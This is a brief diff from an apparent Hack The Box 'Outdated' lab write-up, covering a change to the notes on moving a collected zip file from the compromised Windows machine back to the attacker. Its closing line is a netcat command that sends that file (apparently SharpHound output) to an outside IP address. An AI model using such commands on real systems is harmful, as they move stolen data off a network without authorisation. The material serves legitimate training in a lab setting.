Rogue-1/HTB/Machines/Outdated.md

 C:\temp>
 ```
+Now we need to transfer the created zip file back to our host computer.

-Transferring files in powershell was giving an error for using < with nc so I opted to use CMD
+Note: Originally I was in a powershell environment and I was getting trouble transferring files and powershell was giving an error for using < with nc so I opted to use CMD.

 ```
 C:\temp>C:\\windows\\tasks\\nc.exe 10.10.16.8 1235 < 20220917184029_sharp.zip